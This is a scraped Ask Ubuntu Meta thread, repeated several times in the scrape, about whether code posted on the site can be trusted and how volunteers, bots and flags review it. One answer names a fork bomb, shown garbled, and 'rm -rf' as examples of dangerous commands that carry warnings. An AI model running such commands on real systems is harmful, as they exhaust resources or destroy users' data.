How can we be safe about code from this site that we install?How to handle duplicate answers that add nothing?Formatting, backticks and editingShould we edit offensive content that is only meant to vandalize the site?Why do people post screenshots of their terminals?How to stop users from serial editing that is worth rejection?“This is commentary on another post, not an answer” used for low quality answersHeavy handed application of “off-topic” for new user?Should [messages] be sent to /dev/null?

Degraded Array. RAID 6 with three disk failure

How to properly rewire these splices?

First coefficient of totally positive fundamental unit modulo 3

Sci-fi TV series where a man asks his opponent why repeatedly

How to redeem a wasted youth?

Gravitational Properties of Asteroids

The state of the art in music puzzles

How does Octopus Umbra interact with effects that change the base power and toughness of, and counters on, a creature?

Why is the mean of the natural log of a uniform distribution (between 0 and 1) different from the natural log of 0.5?

Can a fiance sleep at his in-law's?

How does `at` know there will be a time change?

In a world where magic comes from mythological stories, what's stopping my characters from writing more?

Cone and arc with tikz and addplot3

Spacetime and its contribution to space science

Should I adjust rear derailleur as my chain seems too close to each other

How to call my own phone with a loud ringing tone (in order to find it in my house) even if it is in silent mode?

Addressable RGB strip works fine individually but cannot set all LEDs to full white

Do you make me up?

Is "HTTPS Everywhere" still relevant?

How to redeem a wasted youth?

If someone orders a pizza in the US and doesn't pay for it, could they be arrested?

How to write "Œuvres"?

Do any languages have a kinship terms for the relationship between the respective parents of a married couple?

What is this?/How do I do this?



How can we be safe about code from this site that we install?


How to handle duplicate answers that add nothing?Formatting, backticks and editingShould we edit offensive content that is only meant to vandalize the site?Why do people post screenshots of their terminals?How to stop users from serial editing that is worth rejection?“This is commentary on another post, not an answer” used for low quality answersHeavy handed application of “off-topic” for new user?Should [messages] be sent to /dev/null?













7

















There are a lot of people who code solutions and post it in forums like this one. I think, maybe I'm wrong because I'm a beginner, that these people are able to introduce "evil code". Is some organization taking care of this or is it a user's responsibility?






discussion security






share


















migrated from askubuntu.com Jun 14 at 21:44


This question came from our site for Ubuntu users and developers.














  • 3





    Read the 'code' first, work out what it will do, and only use it if you agree it will help and understand what it will do. If you're not 100% sure, build a test environment (vm or real-hardware) and test it yourself there.

    – guiverc
    Jun 14 at 21:23






  • 3





    If you don't understand how to read the code and the poster has no track record I wouldn't install it. An evil person would design the evil code to explode stuff five months after you tested it in a VM. If it was on this site though the evil person would be banned and evil answer deleted. Chances are someone else would spit the evil code before you see it.

    – WinEunuuchs2Unix
    Jun 14 at 21:35






  • 3





    I'd suggest reading this question and answers: If I follow instructions from a blog or Ask Ubuntu, etc, is it always safe?

    – Sergiy Kolodyazhnyy
    Jun 17 at 8:20
















7

















There are a lot of people who code solutions and post it in forums like this one. I think, maybe I'm wrong because I'm a beginner, that these people are able to introduce "evil code". Is some organization taking care of this or is it a user's responsibility?






discussion security






share


















migrated from askubuntu.com Jun 14 at 21:44


This question came from our site for Ubuntu users and developers.














  • 3





    Read the 'code' first, work out what it will do, and only use it if you agree it will help and understand what it will do. If you're not 100% sure, build a test environment (vm or real-hardware) and test it yourself there.

    – guiverc
    Jun 14 at 21:23






  • 3





    If you don't understand how to read the code and the poster has no track record I wouldn't install it. An evil person would design the evil code to explode stuff five months after you tested it in a VM. If it was on this site though the evil person would be banned and evil answer deleted. Chances are someone else would spit the evil code before you see it.

    – WinEunuuchs2Unix
    Jun 14 at 21:35






  • 3





    I'd suggest reading this question and answers: If I follow instructions from a blog or Ask Ubuntu, etc, is it always safe?

    – Sergiy Kolodyazhnyy
    Jun 17 at 8:20














7












7








7








There are a lot of people who code solutions and post it in forums like this one. I think, maybe I'm wrong because I'm a beginner, that these people are able to introduce "evil code". Is some organization taking care of this or is it a user's responsibility?






discussion security






share

















There are a lot of people who code solutions and post it in forums like this one. I think, maybe I'm wrong because I'm a beginner, that these people are able to introduce "evil code". Is some organization taking care of this or is it a user's responsibility?






discussion security




discussion security





share















share












share



share








edited Jun 19 at 11:14









Melebius

7,5728 silver badges16 bronze badges




7,5728 silver badges16 bronze badges










asked Jun 14 at 21:21









VicenteCVicenteC

33 bronze badges




33 bronze badges





migrated from askubuntu.com Jun 14 at 21:44


This question came from our site for Ubuntu users and developers.











migrated from askubuntu.com Jun 14 at 21:44


This question came from our site for Ubuntu users and developers.









migrated from askubuntu.com Jun 14 at 21:44


This question came from our site for Ubuntu users and developers.









  • 3





    Read the 'code' first, work out what it will do, and only use it if you agree it will help and understand what it will do. If you're not 100% sure, build a test environment (vm or real-hardware) and test it yourself there.

    – guiverc
    Jun 14 at 21:23






  • 3





    If you don't understand how to read the code and the poster has no track record I wouldn't install it. An evil person would design the evil code to explode stuff five months after you tested it in a VM. If it was on this site though the evil person would be banned and evil answer deleted. Chances are someone else would spit the evil code before you see it.

    – WinEunuuchs2Unix
    Jun 14 at 21:35






  • 3





    I'd suggest reading this question and answers: If I follow instructions from a blog or Ask Ubuntu, etc, is it always safe?

    – Sergiy Kolodyazhnyy
    Jun 17 at 8:20













  • 3





    Read the 'code' first, work out what it will do, and only use it if you agree it will help and understand what it will do. If you're not 100% sure, build a test environment (vm or real-hardware) and test it yourself there.

    – guiverc
    Jun 14 at 21:23






  • 3





    If you don't understand how to read the code and the poster has no track record I wouldn't install it. An evil person would design the evil code to explode stuff five months after you tested it in a VM. If it was on this site though the evil person would be banned and evil answer deleted. Chances are someone else would spit the evil code before you see it.

    – WinEunuuchs2Unix
    Jun 14 at 21:35






  • 3





    I'd suggest reading this question and answers: If I follow instructions from a blog or Ask Ubuntu, etc, is it always safe?

    – Sergiy Kolodyazhnyy
    Jun 17 at 8:20








3




3





Read the 'code' first, work out what it will do, and only use it if you agree it will help and understand what it will do. If you're not 100% sure, build a test environment (vm or real-hardware) and test it yourself there.

– guiverc
Jun 14 at 21:23





Read the 'code' first, work out what it will do, and only use it if you agree it will help and understand what it will do. If you're not 100% sure, build a test environment (vm or real-hardware) and test it yourself there.

– guiverc
Jun 14 at 21:23




3




3





If you don't understand how to read the code and the poster has no track record I wouldn't install it. An evil person would design the evil code to explode stuff five months after you tested it in a VM. If it was on this site though the evil person would be banned and evil answer deleted. Chances are someone else would spit the evil code before you see it.

– WinEunuuchs2Unix
Jun 14 at 21:35





If you don't understand how to read the code and the poster has no track record I wouldn't install it. An evil person would design the evil code to explode stuff five months after you tested it in a VM. If it was on this site though the evil person would be banned and evil answer deleted. Chances are someone else would spit the evil code before you see it.

– WinEunuuchs2Unix
Jun 14 at 21:35




3




3





I'd suggest reading this question and answers: If I follow instructions from a blog or Ask Ubuntu, etc, is it always safe?

– Sergiy Kolodyazhnyy
Jun 17 at 8:20






I'd suggest reading this question and answers: If I follow instructions from a blog or Ask Ubuntu, etc, is it always safe?

– Sergiy Kolodyazhnyy
Jun 17 at 8:20











3 Answers
3






active

oldest

votes


















6


















Stack Overflow is far ahead of Ask Ubuntu at reviewing code because it's a programming website. In addition to Stack Overflow's normal way of reviewing code by users who volunteer to be reviewers and by Stack Overflow's moderators, there are also chatrooms that were created specifically for reviewing code and several reviewing bots. Some of these same bots are also reviewing posts every day at Ask Ubuntu. It is possible for users to apply to the bot moderators for permission to participate in reviewing the results of the reviewing bots which flags false positive results and trains the bots to be more accurate. Some bots have the adaptive ability to retract their own results if enough false positives are reported by members of the bot's team.



In the end none of these methods can succeed without the participation of human beings, so there must be oversight by users who volunteer to be reviewers. Anyone can participate in improving the quality of posts at Ask Ubuntu. There is no reputation requirement for submitting a suggested edit to any post to be reviewed by Ask Ubuntu's volunteer reviewers.





share























  • 1





    You mean there are bots that scan posts for code snippets and analyse them for malicious things? I haven't heard of that yet, and tbh I would be surprised if that existed, because it would be terribly complex. Or are you only referring to SmokeDetector and similar?

    – Byte Commander
    Jun 14 at 22:54











  • There are bots that scan for plagiarized code. There are also bots that scan for short code snippets that are not accompanied by an explanation of what the code does. However afaik there are not any bots that do deep scanning of code snippets and analyze them for malicious things. As a member of several bot teams I have the privilege of manually reporting my own deep scanning results to the appropriate bot in order to submit it for further review by other reviewers. This is done transparently in a public chatroom and anyone in that chatroom can freely comment about it and frequently does.

    – karel
    Jun 14 at 23:04












  • Ah, cool. So I guess this happens in SObotics? That's nice, I'm really not familiar with most of the things people built there.

    – Byte Commander
    Jun 14 at 23:11











  • SOBotics and SO Close Vote Reviewers have helped me lot.

    – karel
    Jun 15 at 3:15












  • SO moderators do not review code! No more than any other user, anyway. And, as you say in the comments, there are no bots checking for malicious code, so I don't really understand what you're suggesting.

    – terdon
    Jun 16 at 13:27











  • I review low quality posts at Stack Overflow and I always check back on my work to see if the other reviewers at Stack Overflow agree with me. I frequently see that posts that I recommended deletion of were deleted by a Stack Overflow moderator. This is one example of what I meant by Stack Overflow moderators review code. If it's no good they delete the answer. Not just one moderator, several SO moderators do this every day.

    – karel
    Jun 16 at 13:42












  • Why don't I explain this more thoroughly in the answer? Because it's not about Ubuntu, therefore off topic. I'm trying to stay on topic in the answer section. If the game runs into extra innings, I can be as off topic as I want to in a topical chatroom without flooding the answer section.

    – karel
    Jun 16 at 14:41



















5


















ANY code that is going to be doing something you do not want will and must have a big fat warning. Most famous one:



Why did the command ":() :;:" make my system lag so badly I had to reboot?



More because guntbert doubts me :-)



Terminal command to remove unknown file



What does rm -rf do?



`rm -rf ` and `rm -r` have the same results



I have yet to see an answer where we did not have a warning



I personally will interpret any code I see in questions. I fix software problems for a living so I have this weird habit that I HAVE to understand code I see otherwise I keep having this itch. At work I am known for pointing out problems with code where it is not even clear to me I have pointed to a problem. Yes I know I am weird :-X



I know lots of others on AU that review code too. Besides that there are a 10, 20 people on AU I trust when they post code on AU and most elaborate answers tend to come from a select few.





share























  • 1





    You are very confident here - with ANY code - I suggest to s/ANY/Most/ .

    – guntbert
    Jun 15 at 16:10











  • I reworded it but it has to be "any" ;-)

    – Rinzwind
    Jun 15 at 16:20






  • 1





    Those examples are about "obviously" dangerous code - but there may still be cases where someone sticks something malicious between several lines of code/commands. Not every post is thoroughly reviewed. Mind you I don't talk about highly voted answers but according to Murphy's Law we will have malicious code on the site.

    – guntbert
    Jun 15 at 19:37












  • "Not every post is thoroughly reviewed." I believe that is not true. Code from new users will be reviewed. People that have shown they can code (like Jacob Vlijm) maybe not as thorough but that's why we trust them ;-)

    – Rinzwind
    Jun 15 at 19:47


















4


















Excellent things have been said already, but let me add a few words from someone who posts those code snippets once in a while.



How can we be safe about code from this site that we install? You can't. Any piece of code could contain harmful - intentionally or not - elements. While that is also true for snippets on AU, you probably won't find a place with less risk than on AU or other SE sites. The reason is that not only snippets are in general relatively short and clear, but more importantly: anyone can (and will) look into the code, and anyone can comment on or flag a post. Any potential critic is visible directly on the post itself.



That is unlike some private websites where we can often see bad advice or inadvisable commands. If I am a crook and want to inject malicious code, the one environment I need to avoid is SE sites.



As said, using code you didn't write yourself is a risk. In short however: in general, I believe the code posted here, especially from answers that already live a bit longer or posted by people who are around a bit longer, is probably the least of your concerns.





share




























  • Also, code that's fine on MY system might break YOUR system, unintentionally.

    – waltinator
    Jul 4 at 13:11



















3 Answers
3






active

oldest

votes








3 Answers
3






active

oldest

votes









active

oldest

votes






active

oldest

votes









6


















Stack Overflow is far ahead of Ask Ubuntu at reviewing code because it's a programming website. In addition to Stack Overflow's normal way of reviewing code by users who volunteer to be reviewers and by Stack Overflow's moderators, there are also chatrooms that were created specifically for reviewing code and several reviewing bots. Some of these same bots are also reviewing posts every day at Ask Ubuntu. It is possible for users to apply to the bot moderators for permission to participate in reviewing the results of the reviewing bots which flags false positive results and trains the bots to be more accurate. Some bots have the adaptive ability to retract their own results if enough false positives are reported by members of the bot's team.



In the end none of these methods can succeed without the participation of human beings, so there must be oversight by users who volunteer to be reviewers. Anyone can participate in improving the quality of posts at Ask Ubuntu. There is no reputation requirement for submitting a suggested edit to any post to be reviewed by Ask Ubuntu's volunteer reviewers.





share























  • 1





    You mean there are bots that scan posts for code snippets and analyse them for malicious things? I haven't heard of that yet, and tbh I would be surprised if that existed, because it would be terribly complex. Or are you only referring to SmokeDetector and similar?

    – Byte Commander
    Jun 14 at 22:54











  • There are bots that scan for plagiarized code. There are also bots that scan for short code snippets that are not accompanied by an explanation of what the code does. However afaik there are not any bots that do deep scanning of code snippets and analyze them for malicious things. As a member of several bot teams I have the privilege of manually reporting my own deep scanning results to the appropriate bot in order to submit it for further review by other reviewers. This is done transparently in a public chatroom and anyone in that chatroom can freely comment about it and frequently does.

    – karel
    Jun 14 at 23:04












  • Ah, cool. So I guess this happens in SObotics? That's nice, I'm really not familiar with most of the things people built there.

    – Byte Commander
    Jun 14 at 23:11











  • SOBotics and SO Close Vote Reviewers have helped me lot.

    – karel
    Jun 15 at 3:15












  • SO moderators do not review code! No more than any other user, anyway. And, as you say in the comments, there are no bots checking for malicious code, so I don't really understand what you're suggesting.

    – terdon
    Jun 16 at 13:27











  • I review low quality posts at Stack Overflow and I always check back on my work to see if the other reviewers at Stack Overflow agree with me. I frequently see that posts that I recommended deletion of were deleted by a Stack Overflow moderator. This is one example of what I meant by Stack Overflow moderators review code. If it's no good they delete the answer. Not just one moderator, several SO moderators do this every day.

    – karel
    Jun 16 at 13:42












  • Why don't I explain this more thoroughly in the answer? Because it's not about Ubuntu, therefore off topic. I'm trying to stay on topic in the answer section. If the game runs into extra innings, I can be as off topic as I want to in a topical chatroom without flooding the answer section.

    – karel
    Jun 16 at 14:41
















6


















Stack Overflow is far ahead of Ask Ubuntu at reviewing code because it's a programming website. In addition to Stack Overflow's normal way of reviewing code by users who volunteer to be reviewers and by Stack Overflow's moderators, there are also chatrooms that were created specifically for reviewing code and several reviewing bots. Some of these same bots are also reviewing posts every day at Ask Ubuntu. It is possible for users to apply to the bot moderators for permission to participate in reviewing the results of the reviewing bots which flags false positive results and trains the bots to be more accurate. Some bots have the adaptive ability to retract their own results if enough false positives are reported by members of the bot's team.



In the end none of these methods can succeed without the participation of human beings, so there must be oversight by users who volunteer to be reviewers. Anyone can participate in improving the quality of posts at Ask Ubuntu. There is no reputation requirement for submitting a suggested edit to any post to be reviewed by Ask Ubuntu's volunteer reviewers.





share























  • 1





    You mean there are bots that scan posts for code snippets and analyse them for malicious things? I haven't heard of that yet, and tbh I would be surprised if that existed, because it would be terribly complex. Or are you only referring to SmokeDetector and similar?

    – Byte Commander
    Jun 14 at 22:54











  • There are bots that scan for plagiarized code. There are also bots that scan for short code snippets that are not accompanied by an explanation of what the code does. However afaik there are not any bots that do deep scanning of code snippets and analyze them for malicious things. As a member of several bot teams I have the privilege of manually reporting my own deep scanning results to the appropriate bot in order to submit it for further review by other reviewers. This is done transparently in a public chatroom and anyone in that chatroom can freely comment about it and frequently does.

    – karel
    Jun 14 at 23:04












  • Ah, cool. So I guess this happens in SObotics? That's nice, I'm really not familiar with most of the things people built there.

    – Byte Commander
    Jun 14 at 23:11











  • SOBotics and SO Close Vote Reviewers have helped me lot.

    – karel
    Jun 15 at 3:15












  • SO moderators do not review code! No more than any other user, anyway. And, as you say in the comments, there are no bots checking for malicious code, so I don't really understand what you're suggesting.

    – terdon
    Jun 16 at 13:27











  • I review low quality posts at Stack Overflow and I always check back on my work to see if the other reviewers at Stack Overflow agree with me. I frequently see that posts that I recommended deletion of were deleted by a Stack Overflow moderator. This is one example of what I meant by Stack Overflow moderators review code. If it's no good they delete the answer. Not just one moderator, several SO moderators do this every day.

    – karel
    Jun 16 at 13:42












  • Why don't I explain this more thoroughly in the answer? Because it's not about Ubuntu, therefore off topic. I'm trying to stay on topic in the answer section. If the game runs into extra innings, I can be as off topic as I want to in a topical chatroom without flooding the answer section.

    – karel
    Jun 16 at 14:41














6














6










6









Stack Overflow is far ahead of Ask Ubuntu at reviewing code because it's a programming website. In addition to Stack Overflow's normal way of reviewing code by users who volunteer to be reviewers and by Stack Overflow's moderators, there are also chatrooms that were created specifically for reviewing code and several reviewing bots. Some of these same bots are also reviewing posts every day at Ask Ubuntu. It is possible for users to apply to the bot moderators for permission to participate in reviewing the results of the reviewing bots which flags false positive results and trains the bots to be more accurate. Some bots have the adaptive ability to retract their own results if enough false positives are reported by members of the bot's team.



In the end none of these methods can succeed without the participation of human beings, so there must be oversight by users who volunteer to be reviewers. Anyone can participate in improving the quality of posts at Ask Ubuntu. There is no reputation requirement for submitting a suggested edit to any post to be reviewed by Ask Ubuntu's volunteer reviewers.





share
















Stack Overflow is far ahead of Ask Ubuntu at reviewing code because it's a programming website. In addition to Stack Overflow's normal way of reviewing code by users who volunteer to be reviewers and by Stack Overflow's moderators, there are also chatrooms that were created specifically for reviewing code and several reviewing bots. Some of these same bots are also reviewing posts every day at Ask Ubuntu. It is possible for users to apply to the bot moderators for permission to participate in reviewing the results of the reviewing bots which flags false positive results and trains the bots to be more accurate. Some bots have the adaptive ability to retract their own results if enough false positives are reported by members of the bot's team.



In the end none of these methods can succeed without the participation of human beings, so there must be oversight by users who volunteer to be reviewers. Anyone can participate in improving the quality of posts at Ask Ubuntu. There is no reputation requirement for submitting a suggested edit to any post to be reviewed by Ask Ubuntu's volunteer reviewers.






share














share



share








edited Jun 14 at 22:33

























answered Jun 14 at 22:25









karelkarel

69.4k8 silver badges26 bronze badges




69.4k8 silver badges26 bronze badges










  • 1





    You mean there are bots that scan posts for code snippets and analyse them for malicious things? I haven't heard of that yet, and tbh I would be surprised if that existed, because it would be terribly complex. Or are you only referring to SmokeDetector and similar?

    – Byte Commander
    Jun 14 at 22:54











  • There are bots that scan for plagiarized code. There are also bots that scan for short code snippets that are not accompanied by an explanation of what the code does. However afaik there are not any bots that do deep scanning of code snippets and analyze them for malicious things. As a member of several bot teams I have the privilege of manually reporting my own deep scanning results to the appropriate bot in order to submit it for further review by other reviewers. This is done transparently in a public chatroom and anyone in that chatroom can freely comment about it and frequently does.

    – karel
    Jun 14 at 23:04












  • Ah, cool. So I guess this happens in SObotics? That's nice, I'm really not familiar with most of the things people built there.

    – Byte Commander
    Jun 14 at 23:11











  • SOBotics and SO Close Vote Reviewers have helped me lot.

    – karel
    Jun 15 at 3:15












  • SO moderators do not review code! No more than any other user, anyway. And, as you say in the comments, there are no bots checking for malicious code, so I don't really understand what you're suggesting.

    – terdon
    Jun 16 at 13:27











  • I review low quality posts at Stack Overflow and I always check back on my work to see if the other reviewers at Stack Overflow agree with me. I frequently see that posts that I recommended deletion of were deleted by a Stack Overflow moderator. This is one example of what I meant by Stack Overflow moderators review code. If it's no good they delete the answer. Not just one moderator, several SO moderators do this every day.

    – karel
    Jun 16 at 13:42












  • Why don't I explain this more thoroughly in the answer? Because it's not about Ubuntu, therefore off topic. I'm trying to stay on topic in the answer section. If the game runs into extra innings, I can be as off topic as I want to in a topical chatroom without flooding the answer section.

    – karel
    Jun 16 at 14:41













  • 1





    You mean there are bots that scan posts for code snippets and analyse them for malicious things? I haven't heard of that yet, and tbh I would be surprised if that existed, because it would be terribly complex. Or are you only referring to SmokeDetector and similar?

    – Byte Commander
    Jun 14 at 22:54











  • There are bots that scan for plagiarized code. There are also bots that scan for short code snippets that are not accompanied by an explanation of what the code does. However afaik there are not any bots that do deep scanning of code snippets and analyze them for malicious things. As a member of several bot teams I have the privilege of manually reporting my own deep scanning results to the appropriate bot in order to submit it for further review by other reviewers. This is done transparently in a public chatroom and anyone in that chatroom can freely comment about it and frequently does.

    – karel
    Jun 14 at 23:04












  • Ah, cool. So I guess this happens in SObotics? That's nice, I'm really not familiar with most of the things people built there.

    – Byte Commander
    Jun 14 at 23:11











  • SOBotics and SO Close Vote Reviewers have helped me lot.

    – karel
    Jun 15 at 3:15












  • SO moderators do not review code! No more than any other user, anyway. And, as you say in the comments, there are no bots checking for malicious code, so I don't really understand what you're suggesting.

    – terdon
    Jun 16 at 13:27











  • I review low quality posts at Stack Overflow and I always check back on my work to see if the other reviewers at Stack Overflow agree with me. I frequently see that posts that I recommended deletion of were deleted by a Stack Overflow moderator. This is one example of what I meant by Stack Overflow moderators review code. If it's no good they delete the answer. Not just one moderator, several SO moderators do this every day.

    – karel
    Jun 16 at 13:42












  • Why don't I explain this more thoroughly in the answer? Because it's not about Ubuntu, therefore off topic. I'm trying to stay on topic in the answer section. If the game runs into extra innings, I can be as off topic as I want to in a topical chatroom without flooding the answer section.

    – karel
    Jun 16 at 14:41








1




1





You mean there are bots that scan posts for code snippets and analyse them for malicious things? I haven't heard of that yet, and tbh I would be surprised if that existed, because it would be terribly complex. Or are you only referring to SmokeDetector and similar?

– Byte Commander
Jun 14 at 22:54





You mean there are bots that scan posts for code snippets and analyse them for malicious things? I haven't heard of that yet, and tbh I would be surprised if that existed, because it would be terribly complex. Or are you only referring to SmokeDetector and similar?

– Byte Commander
Jun 14 at 22:54













There are bots that scan for plagiarized code. There are also bots that scan for short code snippets that are not accompanied by an explanation of what the code does. However afaik there are not any bots that do deep scanning of code snippets and analyze them for malicious things. As a member of several bot teams I have the privilege of manually reporting my own deep scanning results to the appropriate bot in order to submit it for further review by other reviewers. This is done transparently in a public chatroom and anyone in that chatroom can freely comment about it and frequently does.

– karel
Jun 14 at 23:04






There are bots that scan for plagiarized code. There are also bots that scan for short code snippets that are not accompanied by an explanation of what the code does. However afaik there are not any bots that do deep scanning of code snippets and analyze them for malicious things. As a member of several bot teams I have the privilege of manually reporting my own deep scanning results to the appropriate bot in order to submit it for further review by other reviewers. This is done transparently in a public chatroom and anyone in that chatroom can freely comment about it and frequently does.

– karel
Jun 14 at 23:04














Ah, cool. So I guess this happens in SObotics? That's nice, I'm really not familiar with most of the things people built there.

– Byte Commander
Jun 14 at 23:11





Ah, cool. So I guess this happens in SObotics? That's nice, I'm really not familiar with most of the things people built there.

– Byte Commander
Jun 14 at 23:11













SOBotics and SO Close Vote Reviewers have helped me lot.

– karel
Jun 15 at 3:15






SOBotics and SO Close Vote Reviewers have helped me lot.

– karel
Jun 15 at 3:15














SO moderators do not review code! No more than any other user, anyway. And, as you say in the comments, there are no bots checking for malicious code, so I don't really understand what you're suggesting.

– terdon
Jun 16 at 13:27





SO moderators do not review code! No more than any other user, anyway. And, as you say in the comments, there are no bots checking for malicious code, so I don't really understand what you're suggesting.

– terdon
Jun 16 at 13:27













I review low quality posts at Stack Overflow and I always check back on my work to see if the other reviewers at Stack Overflow agree with me. I frequently see that posts that I recommended deletion of were deleted by a Stack Overflow moderator. This is one example of what I meant by Stack Overflow moderators review code. If it's no good they delete the answer. Not just one moderator, several SO moderators do this every day.

– karel
Jun 16 at 13:42






I review low quality posts at Stack Overflow and I always check back on my work to see if the other reviewers at Stack Overflow agree with me. I frequently see that posts that I recommended deletion of were deleted by a Stack Overflow moderator. This is one example of what I meant by Stack Overflow moderators review code. If it's no good they delete the answer. Not just one moderator, several SO moderators do this every day.

– karel
Jun 16 at 13:42














Why don't I explain this more thoroughly in the answer? Because it's not about Ubuntu, therefore off topic. I'm trying to stay on topic in the answer section. If the game runs into extra innings, I can be as off topic as I want to in a topical chatroom without flooding the answer section.

– karel
Jun 16 at 14:41






Why don't I explain this more thoroughly in the answer? Because it's not about Ubuntu, therefore off topic. I'm trying to stay on topic in the answer section. If the game runs into extra innings, I can be as off topic as I want to in a topical chatroom without flooding the answer section.

– karel
Jun 16 at 14:41












5


















ANY code that is going to be doing something you do not want will and must have a big fat warning. Most famous one:



Why did the command ":() :;:" make my system lag so badly I had to reboot?



More because guntbert doubts me :-)



Terminal command to remove unknown file



What does rm -rf do?



`rm -rf ` and `rm -r` have the same results



I have yet to see an answer where we did not have a warning



I personally will interpret any code I see in questions. I fix software problems for a living so I have this weird habit that I HAVE to understand code I see otherwise I keep having this itch. At work I am known for pointing out problems with code where it is not even clear to me I have pointed to a problem. Yes I know I am weird :-X



I know lots of others on AU that review code too. Besides that there are a 10, 20 people on AU I trust when they post code on AU and most elaborate answers tend to come from a select few.





share























  • 1





    You are very confident here - with ANY code - I suggest to s/ANY/Most/ .

    – guntbert
    Jun 15 at 16:10











  • I reworded it but it has to be "any" ;-)

    – Rinzwind
    Jun 15 at 16:20






  • 1





    Those examples are about "obviously" dangerous code - but there may still be cases where someone sticks something malicious between several lines of code/commands. Not every post is thoroughly reviewed. Mind you I don't talk about highly voted answers but according to Murphy's Law we will have malicious code on the site.

    – guntbert
    Jun 15 at 19:37












  • "Not every post is thoroughly reviewed." I believe that is not true. Code from new users will be reviewed. People that have shown they can code (like Jacob Vlijm) maybe not as thorough but that's why we trust them ;-)

    – Rinzwind
    Jun 15 at 19:47















5


















ANY code that is going to be doing something you do not want will and must have a big fat warning. Most famous one:



Why did the command ":() :;:" make my system lag so badly I had to reboot?



More because guntbert doubts me :-)



Terminal command to remove unknown file



What does rm -rf do?



`rm -rf ` and `rm -r` have the same results



I have yet to see an answer where we did not have a warning



I personally will interpret any code I see in questions. I fix software problems for a living so I have this weird habit that I HAVE to understand code I see otherwise I keep having this itch. At work I am known for pointing out problems with code where it is not even clear to me I have pointed to a problem. Yes I know I am weird :-X



I know lots of others on AU that review code too. Besides that there are a 10, 20 people on AU I trust when they post code on AU and most elaborate answers tend to come from a select few.





share























  • 1





    You are very confident here - with ANY code - I suggest to s/ANY/Most/ .

    – guntbert
    Jun 15 at 16:10











  • I reworded it but it has to be "any" ;-)

    – Rinzwind
    Jun 15 at 16:20






  • 1





    Those examples are about "obviously" dangerous code - but there may still be cases where someone sticks something malicious between several lines of code/commands. Not every post is thoroughly reviewed. Mind you I don't talk about highly voted answers but according to Murphy's Law we will have malicious code on the site.

    – guntbert
    Jun 15 at 19:37












  • "Not every post is thoroughly reviewed." I believe that is not true. Code from new users will be reviewed. People that have shown they can code (like Jacob Vlijm) maybe not as thorough but that's why we trust them ;-)

    – Rinzwind
    Jun 15 at 19:47













5














5










5









ANY code that is going to be doing something you do not want will and must have a big fat warning. Most famous one:



Why did the command ":() :;:" make my system lag so badly I had to reboot?



More because guntbert doubts me :-)



Terminal command to remove unknown file



What does rm -rf do?



`rm -rf ` and `rm -r` have the same results



I have yet to see an answer where we did not have a warning



I personally will interpret any code I see in questions. I fix software problems for a living so I have this weird habit that I HAVE to understand code I see otherwise I keep having this itch. At work I am known for pointing out problems with code where it is not even clear to me I have pointed to a problem. Yes I know I am weird :-X



I know lots of others on AU that review code too. Besides that there are a 10, 20 people on AU I trust when they post code on AU and most elaborate answers tend to come from a select few.





share
















ANY code that is going to be doing something you do not want will and must have a big fat warning. Most famous one:



Why did the command ":() :;:" make my system lag so badly I had to reboot?



More because guntbert doubts me :-)



Terminal command to remove unknown file



What does rm -rf do?



`rm -rf ` and `rm -r` have the same results



I have yet to see an answer where we did not have a warning



I personally will interpret any code I see in questions. I fix software problems for a living so I have this weird habit that I HAVE to understand code I see otherwise I keep having this itch. At work I am known for pointing out problems with code where it is not even clear to me I have pointed to a problem. Yes I know I am weird :-X



I know lots of others on AU that review code too. Besides that there are a 10, 20 people on AU I trust when they post code on AU and most elaborate answers tend to come from a select few.






share














share



share








edited Jun 15 at 19:45

























answered Jun 15 at 9:44









RinzwindRinzwind

224k18 silver badges42 bronze badges




224k18 silver badges42 bronze badges










  • 1





    You are very confident here - with ANY code - I suggest to s/ANY/Most/ .

    – guntbert
    Jun 15 at 16:10











  • I reworded it but it has to be "any" ;-)

    – Rinzwind
    Jun 15 at 16:20






  • 1





    Those examples are about "obviously" dangerous code - but there may still be cases where someone sticks something malicious between several lines of code/commands. Not every post is thoroughly reviewed. Mind you I don't talk about highly voted answers but according to Murphy's Law we will have malicious code on the site.

    – guntbert
    Jun 15 at 19:37












  • "Not every post is thoroughly reviewed." I believe that is not true. Code from new users will be reviewed. People that have shown they can code (like Jacob Vlijm) maybe not as thorough but that's why we trust them ;-)

    – Rinzwind
    Jun 15 at 19:47












  • 1





    You are very confident here - with ANY code - I suggest to s/ANY/Most/ .

    – guntbert
    Jun 15 at 16:10











  • I reworded it but it has to be "any" ;-)

    – Rinzwind
    Jun 15 at 16:20






  • 1





    Those examples are about "obviously" dangerous code - but there may still be cases where someone sticks something malicious between several lines of code/commands. Not every post is thoroughly reviewed. Mind you I don't talk about highly voted answers but according to Murphy's Law we will have malicious code on the site.

    – guntbert
    Jun 15 at 19:37












  • "Not every post is thoroughly reviewed." I believe that is not true. Code from new users will be reviewed. People that have shown they can code (like Jacob Vlijm) maybe not as thorough but that's why we trust them ;-)

    – Rinzwind
    Jun 15 at 19:47







1




1





You are very confident here - with ANY code - I suggest to s/ANY/Most/ .

– guntbert
Jun 15 at 16:10





You are very confident here - with ANY code - I suggest to s/ANY/Most/ .

– guntbert
Jun 15 at 16:10













I reworded it but it has to be "any" ;-)

– Rinzwind
Jun 15 at 16:20





I reworded it but it has to be "any" ;-)

– Rinzwind
Jun 15 at 16:20




1




1





Those examples are about "obviously" dangerous code - but there may still be cases where someone sticks something malicious between several lines of code/commands. Not every post is thoroughly reviewed. Mind you I don't talk about highly voted answers but according to Murphy's Law we will have malicious code on the site.

– guntbert
Jun 15 at 19:37






Those examples are about "obviously" dangerous code - but there may still be cases where someone sticks something malicious between several lines of code/commands. Not every post is thoroughly reviewed. Mind you I don't talk about highly voted answers but according to Murphy's Law we will have malicious code on the site.

– guntbert
Jun 15 at 19:37














"Not every post is thoroughly reviewed." I believe that is not true. Code from new users will be reviewed. People that have shown they can code (like Jacob Vlijm) maybe not as thorough but that's why we trust them ;-)

– Rinzwind
Jun 15 at 19:47





"Not every post is thoroughly reviewed." I believe that is not true. Code from new users will be reviewed. People that have shown they can code (like Jacob Vlijm) maybe not as thorough but that's why we trust them ;-)

– Rinzwind
Jun 15 at 19:47











4


















Excellent things have been said already, but let me add a few words from someone who posts those code snippets once in a while.



How can we be safe about code from this site that we install? You can't. Any piece of code could contain harmful - intentionally or not - elements. While that is also true for snippets on AU, you probably won't find a place with less risk than on AU or other SE sites. The reason is that not only snippets are in general relatively short and clear, but more importantly: anyone can (and will) look into the code, and anyone can comment on or flag a post. Any potential critic is visible directly on the post itself.



That is unlike some private websites where we can often see bad advice or inadvisable commands. If I am a crook and want to inject malicious code, the one environment I need to avoid is SE sites.



